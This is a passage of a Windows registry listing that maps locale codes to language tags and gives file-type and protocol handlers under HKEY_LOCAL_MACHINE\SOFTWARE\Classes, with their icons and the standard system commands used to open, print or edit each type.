zh;@%SystemRoot%\system32\mlang.dll,-4375 0009 REG_SZ en;@%SystemRoot%\system32\mlang.dll,-4385 0401 REG_SZ ar-sa;@%SystemRoot%\system32\mlang.dll,-4355 0402 REG_SZ bg;@%SystemRoot%\system32\mlang.dll,-4372 0403 REG_SZ ca;@%SystemRoot%\system32\mlang.dll,-4374 0404 REG_SZ zh-tw;@%SystemRoot%\system32\mlang.dll,-4376 0405 REG_SZ cs;@%SystemRoot%\system32\mlang.dll,-4381 0406 REG_SZ da;@%SystemRoot%\system32\mlang.dll,-4382 0407 REG_SZ de;@%SystemRoot%\system32\mlang.dll,-4406 0408 REG_SZ el;@%SystemRoot%\system32\mlang.dll,-4411 0409 REG_SZ en-us;@%SystemRoot%\system32\mlang.dll,-4386 040A REG_SZ es;@%SystemRoot%\system32\mlang.dll,-4441 040B REG_SZ fi;@%SystemRoot%\system32\mlang.dll,-4399 040C REG_SZ fr;@%SystemRoot%\system32\mlang.dll,-4400 040D REG_SZ he;@%SystemRoot%\system32\mlang.dll,-4412 040E REG_SZ hu;@%SystemRoot%\system32\mlang.dll,-4414 040F REG_SZ is;@%SystemRoot%\system32\mlang.dll,-4415 0410 REG_SZ it;@%SystemRoot%\system32\mlang.dll,-4417 0411 REG_SZ ja;@%SystemRoot%\system32\mlang.dll,-4419 0412 REG_SZ ko;@%SystemRoot%\system32\mlang.dll,-4420 0413 REG_SZ nl;@%SystemRoot%\system32\mlang.dll,-4383 0414 REG_SZ no;@%SystemRoot%\system32\mlang.dll,-4426 0415 REG_SZ pl;@%SystemRoot%\system32\mlang.dll,-4428 0416 REG_SZ pt-br;@%SystemRoot%\system32\mlang.dll,-4429 0417 REG_SZ rm;@%SystemRoot%\system32\mlang.dll,-4431 0418 REG_SZ ro;@%SystemRoot%\system32\mlang.dll,-4432 0419 REG_SZ ru;@%SystemRoot%\system32\mlang.dll,-4434 041A REG_SZ hr;@%SystemRoot%\system32\mlang.dll,-4380 041B REG_SZ sk;@%SystemRoot%\system32\mlang.dll,-4438 041C REG_SZ sq;@%SystemRoot%\system32\mlang.dll,-4353 041D REG_SZ sv;@%SystemRoot%\system32\mlang.dll,-4462 041E REG_SZ th;@%SystemRoot%\system32\mlang.dll,-4464 041F REG_SZ tr;@%SystemRoot%\system32\mlang.dll,-4467 0420 REG_SZ ur;@%SystemRoot%\system32\mlang.dll,-4469 0421 REG_SZ in;@%SystemRoot%\system32\mlang.dll,-4416 0422 REG_SZ uk;@%SystemRoot%\system32\mlang.dll,-4468 0423 REG_SZ be;@%SystemRoot%\system32\mlang.dll,-4373 0424 REG_SZ sl;@%SystemRoot%\system32\mlang.dll,-4439 0425 REG_SZ et;@%SystemRoot%\system32\mlang.dll,-4396 0426 REG_SZ lv;@%SystemRoot%\system32\mlang.dll,-4421 0427 REG_SZ lt;@%SystemRoot%\system32\mlang.dll,-4422 0429 REG_SZ fa;@%SystemRoot%\system32\mlang.dll,-4398 042A REG_SZ vi;@%SystemRoot%\system32\mlang.dll,-4470 042D REG_SZ eu;@%SystemRoot%\system32\mlang.dll,-4371 042E REG_SZ sb;@%SystemRoot%\system32\mlang.dll,-4440 042F REG_SZ mk;@%SystemRoot%\system32\mlang.dll,-4423 0430 REG_SZ sx;@%SystemRoot%\system32\mlang.dll,-4461 0431 REG_SZ ts;@%SystemRoot%\system32\mlang.dll,-4465 0432 REG_SZ tn;@%SystemRoot%\system32\mlang.dll,-4466 0434 REG_SZ xh;@%SystemRoot%\system32\mlang.dll,-4471 0435 REG_SZ zu;@%SystemRoot%\system32\mlang.dll,-4473 0436 REG_SZ af;@%SystemRoot%\system32\mlang.dll,-4352 0438 REG_SZ fo;@%SystemRoot%\system32\mlang.dll,-4397 0439 REG_SZ hi;@%SystemRoot%\system32\mlang.dll,-4413 043A REG_SZ mt;@%SystemRoot%\system32\mlang.dll,-4425 043C REG_SZ gd;@%SystemRoot%\system32\mlang.dll,-4405 043D REG_SZ ji;@%SystemRoot%\system32\mlang.dll,-4472 043E REG_SZ ms;@%SystemRoot%\system32\mlang.dll,-4424 0801 REG_SZ ar-iq;@%SystemRoot%\system32\mlang.dll,-4356 0804 REG_SZ zh-cn;@%SystemRoot%\system32\mlang.dll,-4377 0807 REG_SZ de-ch;@%SystemRoot%\system32\mlang.dll,-4407 0809 REG_SZ en-gb;@%SystemRoot%\system32\mlang.dll,-4387 080A REG_SZ es-mx;@%SystemRoot%\system32\mlang.dll,-4442 080C REG_SZ fr-be;@%SystemRoot%\system32\mlang.dll,-4401 0810 REG_SZ it-ch;@%SystemRoot%\system32\mlang.dll,-4418 0813 REG_SZ nl-be;@%SystemRoot%\system32\mlang.dll,-4384 0814 REG_SZ no;@%SystemRoot%\system32\mlang.dll,-4427 0816 REG_SZ pt;@%SystemRoot%\system32\mlang.dll,-4430 0818 REG_SZ ro-mo;@%SystemRoot%\system32\mlang.dll,-4433 0819 REG_SZ ru-mo;@%SystemRoot%\system32\mlang.dll,-4435 081A REG_SZ sr;@%SystemRoot%\system32\mlang.dll,-4437 081D REG_SZ sv-fi;@%SystemRoot%\system32\mlang.dll,-4463 0C01 REG_SZ ar-eg;@%SystemRoot%\system32\mlang.dll,-4357 0C04 REG_SZ zh-hk;@%SystemRoot%\system32\mlang.dll,-4378 0C07 REG_SZ de-at;@%SystemRoot%\system32\mlang.dll,-4408 0C09 REG_SZ en-au;@%SystemRoot%\system32\mlang.dll,-4388 0C0A REG_SZ es;@%SystemRoot%\system32\mlang.dll,-4443 0C0C REG_SZ fr-ca;@%SystemRoot%\system32\mlang.dll,-4402 0C1A REG_SZ sr;@%SystemRoot%\system32\mlang.dll,-4436 1001 REG_SZ ar-ly;@%SystemRoot%\system32\mlang.dll,-4358 1004 REG_SZ zh-sg;@%SystemRoot%\system32\mlang.dll,-4379 1007 REG_SZ de-lu;@%SystemRoot%\system32\mlang.dll,-4409 1009 REG_SZ en-ca;@%SystemRoot%\system32\mlang.dll,-4389 100A REG_SZ es-gt;@%SystemRoot%\system32\mlang.dll,-4444 100C REG_SZ fr-ch;@%SystemRoot%\system32\mlang.dll,-4403 1401 REG_SZ ar-dz;@%SystemRoot%\system32\mlang.dll,-4359 1407 REG_SZ de-li;@%SystemRoot%\system32\mlang.dll,-4410 1409 REG_SZ en-nz;@%SystemRoot%\system32\mlang.dll,-4390 140A REG_SZ es-cr;@%SystemRoot%\system32\mlang.dll,-4445 140C REG_SZ fr-lu;@%SystemRoot%\system32\mlang.dll,-4404 1801 REG_SZ ar-ma;@%SystemRoot%\system32\mlang.dll,-4360 1809 REG_SZ en-ie;@%SystemRoot%\system32\mlang.dll,-4391 180A REG_SZ es-pa;@%SystemRoot%\system32\mlang.dll,-4446 1C01 REG_SZ ar-tn;@%SystemRoot%\system32\mlang.dll,-4361 1C09 REG_SZ en-za;@%SystemRoot%\system32\mlang.dll,-4392 1C0A REG_SZ es-do;@%SystemRoot%\system32\mlang.dll,-4447 2001 REG_SZ ar-om;@%SystemRoot%\system32\mlang.dll,-4362 2009 REG_SZ en-jm;@%SystemRoot%\system32\mlang.dll,-4393 200A REG_SZ es-ve;@%SystemRoot%\system32\mlang.dll,-4448 2401 REG_SZ ar-ye;@%SystemRoot%\system32\mlang.dll,-4363 240A REG_SZ es-co;@%SystemRoot%\system32\mlang.dll,-4449 2801 REG_SZ ar-sy;@%SystemRoot%\system32\mlang.dll,-4364 2809 REG_SZ en-bz;@%SystemRoot%\system32\mlang.dll,-4394 280A REG_SZ es-pe;@%SystemRoot%\system32\mlang.dll,-4450 2C01 REG_SZ ar-jo;@%SystemRoot%\system32\mlang.dll,-4365 2C09 REG_SZ en-tt;@%SystemRoot%\system32\mlang.dll,-4395 2C0A REG_SZ es-ar;@%SystemRoot%\system32\mlang.dll,-4451 3001 REG_SZ ar-lb;@%SystemRoot%\system32\mlang.dll,-4366 300A REG_SZ es-ec;@%SystemRoot%\system32\mlang.dll,-4452 3401 REG_SZ ar-kw;@%SystemRoot%\system32\mlang.dll,-4367 340A REG_SZ es-cl;@%SystemRoot%\system32\mlang.dll,-4453 3801 REG_SZ ar-ae;@%SystemRoot%\system32\mlang.dll,-4368 380A REG_SZ es-uy;@%SystemRoot%\system32\mlang.dll,-4454 3C01 REG_SZ ar-bh;@%SystemRoot%\system32\mlang.dll,-4369 3C0A REG_SZ es-py;@%SystemRoot%\system32\mlang.dll,-4455 4001 REG_SZ ar-qa;@%SystemRoot%\system32\mlang.dll,-4370 400A REG_SZ es-bo;@%SystemRoot%\system32\mlang.dll,-4456 440A REG_SZ es-sv;@%SystemRoot%\system32\mlang.dll,-4457 480A REG_SZ es-hn;@%SystemRoot%\system32\mlang.dll,-4458 4C0A REG_SZ es-ni;@%SystemRoot%\system32\mlang.dll,-4459 500A REG_SZ es-pr;@%SystemRoot%\system32\mlang.dll,-4460 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-availablenetworks\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\LaunchWinApp.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-mmsys\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-msdt\shell\open\command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\msdt.exe" %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-perception-simulation\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\PerceptionSimulation\PerceptionSimulationInput.exe,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-perception-simulation\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\PerceptionSimulation\PerceptionSimulationInput.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-rdx-document\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\RDXService,OpenRDXDocument %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-settings-connectabledevices\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\LaunchWinApp.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-settings-displays-topology\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\LaunchWinApp.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ms-virtualtouchpad\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\system32\LaunchWinApp.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\mmcbase.dll,-130 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shell\Author MUIVerb REG_EXPAND_SZ @%SystemRoot%\system32\mmcbase.dll,-13351 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shell\Author\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe /a "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mscfile\shell\RunAs\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Package FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\msimsg.dll,-34 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Package\shell\Open MUIVerb REG_EXPAND_SZ @%SystemRoot%\System32\msimsg.dll,-36 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Package\shell\Open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\msiexec.exe" /i "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Package\shell\Repair MUIVerb REG_EXPAND_SZ @%SystemRoot%\System32\msimsg.dll,-37 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Package\shell\Repair\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\msiexec.exe" /f "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Package\shell\Uninstall MUIVerb REG_EXPAND_SZ @%SystemRoot%\System32\msimsg.dll,-38 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Package\shell\Uninstall\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\msiexec.exe" /x "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Patch FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\msimsg.dll,-35 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Patch\shell\Open MUIVerb REG_EXPAND_SZ @%SystemRoot%\System32\msimsg.dll,-39 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Msi.Patch\shell\Open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\msiexec.exe" /p "%1" %* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSInfoFile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\msinfo32.exe,-10001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSInfoFile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\msinfo32.exe,-10002 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSInfoFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\msinfo32.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSSppLicenseFile FriendlyTypeName REG_SZ @%SystemRoot%\system32\sppc.dll,-102 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\msstylesfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\themeui.dll,-701 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\msstylesfile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,Control_RunDLL %SystemRoot%\system32\desk.cpl desk,@Appearance /Action:OpenMSTheme /file:"%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\NetServer\shell\remotedesktop MUIVerb REG_EXPAND_SZ @%systemroot%\system32\mstsc.exe,-4006 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\Microsoft Corporation/Xbox 360\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\Networkexplorer.dll,-130 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ODBC.FileDSN\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\odbcint.dll,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\opensearchblocked\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-105 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\opensearchdescription\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-1025 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\opensearchdescription\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\opensearchfilefolderresult\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll,3 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\otffile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontext.dll,-419 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\otffile\shell\preview\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\otffile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\P7RFile\shell\add\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtAddP7R %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\P7RFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenP7R %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\P7SFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Package\protocol\StdFileEditing\server (Default) REG_EXPAND_SZ %SystemRoot%\system32\packager.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Package\protocol\StdFileEditing\verb\0 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\packager.dll,-3017 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Package\protocol\StdFileEditing\verb\1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\packager.dll,-3018 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Package2\protocol\StdFileEditing\server (Default) REG_EXPAND_SZ %SystemRoot%\system32\packager.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Package2\protocol\StdFileEditing\verb\0 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\packager.dll,-3017 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Package2\protocol\StdFileEditing\verb\1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\packager.dll,-3018 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-30597 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\DefaultIcon (Default) REG_EXPAND_SZ %systemroot%\system32\imageres.dll,-70 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\protocol\StdFileEditing\server (Default) REG_EXPAND_SZ %systemroot%\system32\mspaint.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\protocol\StdFileEditing\verb\0 LocalizedString REG_EXPAND_SZ @%systemroot%\system32\mspaint.exe,-59420 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\shell\edit\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Paint.Picture\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pbkfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\rasdlg.dll,-353 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pbkfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasdlg.dll,-562 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pbkfile\Shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rasphone.exe -f "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PBrush\protocol\StdFileEditing\server (Default) REG_EXPAND_SZ %systemroot%\system32\mspaint.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PBrush\protocol\StdFileEditing\verb\0 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\mspaint.exe,-59420 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PBrush\shell\edit\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PBrush\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PBrush\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PerfFile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\wdc.dll,-10023 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PerfFile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\wdc.dll,-10024 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PerfFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmc.exe %systemroot%\system32\perfmon.msc /F "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pfmfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\fontext.dll,-419 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pfmfile\shell\preview\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pfmfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontview.exe /p %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PFXFile\shell\add\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtAddPFX %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PFXFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPFX %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PhotoViewer.FileAssoc.Tiff\DefaultIcon (Default) REG_SZ %SystemRoot%\System32\imageres.dll,-122 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PhotoViewer.FileAssoc.Tiff\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\piffile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\acppage.dll,-6005 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pjpegfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-30596 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-72 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pjpegfile\shell\printto\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\shimgvw.dll",ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pnffile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\setupapi.dll,-2001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-67 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pngfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-30598 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-83 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\pngfile\shell\printto\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\shimgvw.dll",ImageView_PrintTo /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Previous.Versions FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\twext.dll,-1027 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Previous.Versions\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\twext.dll,-100 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\prffile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\msrating.dll,-3001 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\prffile\DefaultIcon (Default) REG_EXPAND_SZ @%SystemRoot%\System32\msrating.dll,3 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\prffile\shell\Open\command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnPRF %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ratfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\msrating.dll,-3000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon (Default) REG_EXPAND_SZ @%SystemRoot%\System32\msrating.dll,8 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ratfile\Shell\Open\Command (Default) REG_EXPAND_SZ "%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnRAT %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RDBFileProperties.1 FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\rdbui.dll,-1008 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RDBFileProperties.1\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\rdbui.dll,-300 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RDP.File FriendlyTypeName REG_EXPAND_SZ @%systemroot%\system32\mstsc.exe,-4004 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RDP.File\DefaultIcon (Default) REG_EXPAND_SZ %systemroot%\system32\mstsc.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RDP.File\shell\Connect MUIVerb REG_EXPAND_SZ @%systemroot%\system32\mstsc.exe,-4002 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RDP.File\shell\Edit MUIVerb REG_EXPAND_SZ @%systemroot%\system32\mstsc.exe,-4003 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RDP.File\shell\Open\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mstsc.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\regedit.exe,-309 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\regedit.exe,1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\edit\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\notepad.exe "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open MUIVerb REG_EXPAND_SZ @%SystemRoot%\regedit.exe,-310 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\print\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\notepad.exe /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RemoteAssistance.1 FriendlyTypeName REG_EXPAND_SZ @%systemroot%\system32\msra.exe,-558 InfoTip REG_EXPAND_SZ @%systemroot%\system32\msra.exe,-558 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\RemoteAssistance.1\Shell\open\command (Default) REG_EXPAND_SZ "%systemRoot%\system32\msra.exe" -openfile "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rlefile\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\mspaint.exe,-3 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rlefile\shell\open\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rlefile\shell\print\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /p "%1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\rlefile\shell\printto\command (Default) REG_EXPAND_SZ "%systemroot%\system32\mspaint.exe" /pt "%1" "%2" "%3" "%4" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SavedDsQuery FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\dsquery.dll,-120 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SavedDsQuery\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\dsquery.dll,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SavedDsQuery\Shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\dsquery.dll,OpenSavedDsQuery %1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\search FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\explorer.exe,-6010 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\search\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\search-ms FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\explorer.exe,-6010 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\search-ms\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\Explorer.exe /separate,/idlist,%I,%L HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SearchConnectorFolder\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-1025 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SearchFolder FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\searchfolder.dll,-9023 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SearchFolder\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-8 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SettingContent FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\System32\shell32.dll,-34627 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SHCmdFile\shell\open\command (Default) REG_EXPAND_SZ %SystemRoot%\explorer.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Shell.CDBurn\Shell\Prepare\Command (Default) REG_EXPAND_SZ 